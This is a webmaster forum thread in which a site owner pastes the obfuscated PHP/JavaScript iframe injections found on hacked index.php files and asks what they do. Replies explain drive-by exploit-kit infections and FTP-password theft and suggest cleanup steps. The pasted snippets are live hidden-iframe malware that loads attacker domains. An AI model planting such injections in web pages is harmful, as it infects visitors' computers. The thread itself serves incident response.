Hi, All, but four of my 29 sites were hacked Please read all before commenting I have a a bunch of question questions. 1.) My 29 sites are on 6 different hosts. Someone thought it was because of my banner roator, however sites that DID NOT have the banner roator on them were hacked also. 2.) Each site has a different passwords some as long as this example "nviXR428#nnbks!Y2" Now let's talk about the four that were not hacked or if they were for some reason they did not mess with the site That I could find. Two of them were .htm sites. The other two are .PHP One site is a wordpress blog. The other site, a PHP site has this code in the .htaccess I bought this site and I did not place this code in the others. Would this code make a difference? # disable directory browsing Options All -Indexes # protect the htaccess file <files .htaccess> order allow,deny deny from all </files> # disable the server signature ServerSignature Off # limit file uploads to 10mb to prevent DoS attacks LimitRequestBody 10240000 # protect php.ini <files *.ini> order allow,deny deny from all </files> # protect config.php <files config.php> order allow,deny deny from all </files> # protect cron.php <files cron.php> order allow,deny deny from all </files> # protect ping.php <files ping.php> order allow,deny deny from all </files> RewriteEngine on RewriteRule ^MSOffice/(.*)$ / [R=301] RewriteRule ^_vti_(.*)$ / [R=301] RewriteRule ^(.*)index.rdf$ /rss.php [R=301] Code (markup): I have a NEW just out of the box computer I am using I ran Seach & Destroy & McAfee They both say Clean. What would your Steps be? Here are the different codes that were placed on the index.php of the sites. Can any one tell me what they do or mean??? <?php echo '<script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script>'; ?> <?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?><?php echo '<script>document.write("<if" +"r" +"a"+"m"+"e" +" s"+"r"+"c"+"="+ "h"+ "t"+"t"+"p"+ ":"+ "/"+ "/d"+ "e" +"l"+"z"+"z" +"e" +"r" +"ro" +"."+"c" +"n" +"/ he"+"i" +"g" +"ht="+"1 wid"+"th"+ "="+"1"+">"+"<"+ "/"+"if"+ "r" +"a"+ "me>");</script>'; ?> <?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?><?php echo '<script>document.write("<if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"><"+"/ifram"+"e" +">");</script>'; ?> <?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?><?php echo '<script>document.write("<if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"><"+"/ifram"+"e" +">");</script>'; ?><?php echo '<script>document.write("<iframe" +" sr"+"c=h" +"t"+"tp://delzz" +"erro.c"+"n/ " +"he"+"ight=1 "+"widt" +"h=1"+"></ifr" +"a" +"me"+">");</script>'; ?><?php echo ''; ?><?php echo '<script>document.write("<if" +"r" +"a"+"m"+"e" +" s"+"r"+"c"+"="+ "h"+ "t"+"t"+"p"+ ":"+ "/"+ "/d"+ "e" +"l"+"z"+"z" +"e" +"r" +"ro" +"."+"c" +"n" +"/ he"+"i" +"g" +"ht="+"1 wid"+"th"+ "="+"1"+">"+"<"+ "/"+"if"+ "r" +"a"+ "me>");</script>'; ?><?php echo '<script>document.write("<" +"i"+ "fr"+ "ame"+ " s" +"r"+"c"+"=h"+ "t"+"t" +"p"+ ":" +"//vi"+ "p"+"pr"+ "o"+"j"+ "e" +"c" +"t"+"s."+ "c" +"n" +"/ "+"h" +"ei"+"g"+ "h"+ "t"+ "=" +"1"+ " wi"+ "d" +"th=" +"1></i" +"f"+ "ra"+"m"+"e>");</script>'; ?> <?php echo '<script>document.write("<if"+"rame "+"s" +"r"+"c=http:/"+"/u" +"pd"+"ateda" +"te"+".cn"+"/ " +"hei"+"g"+"h"+"t=1" +" "+"wi"+"dth="+"1"+"><"+"/ifram"+"e" +">");</script>'; ?> <?php echo '<script>document.write("<i" +"fra" +"me "+ "s" +"r" +"c=http:" +"/" +"/"+ "u"+ "pdate" +"d" +"a" +"te." +"c" +"n" +"/" +" h" +"e" +"i" +"ght=1 " +"wid" +"t" +"h=1" +"><" +"/ifr"+ "am"+ "e" +">")</script>'; ?> <?php echo '<script>document.write("<" +"i"+ "fr"+ "ame"+ " s" +"r"+"c"+"=h"+ "t"+"t" +"p"+ ":" +"//vi"+ "p"+"pr"+ "o"+"j"+ "e" +"c" +"t"+"s."+ "c" +"n" +"/ "+"h" +"ei"+"g"+ "h"+ "t"+ "=" +"1"+ " wi"+ "d" +"th=" +"1></i" +"f"+ "ra"+"m"+"e>");</script>'; ?> Code (markup): Thanks in Advance Butterflies Forever Sami
Have you checked all of your log files? If someone has gained access to the server then it will be in the logs (unless they modified the logs!). Failing that, it could be down to many things. Might want to secure your file permissions and check for any XSS attempts/vulnerabilities. Make sure all the packages on your server are updated too.
The ol iframe injection huh? How does this hacking takes place: This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. The hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords etc to the hacker(s) and moves on. After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers infection site, where the person's computer will be injected and infected. And so the cycle continues Solution: Change the FTP password and it will usually stop. The only reason it wouldn't is if a keylogger is on your personal computer and since you change the password using the same computer, you just gave the passwords back to the hackers again. Just changing password is not complete solution but is the first step. Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer. If the innocent visitor has an ftp or root password for any internet sites (perhaps your host is infected?), the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference. I really hope this helps shed some light on the situation. Good luck!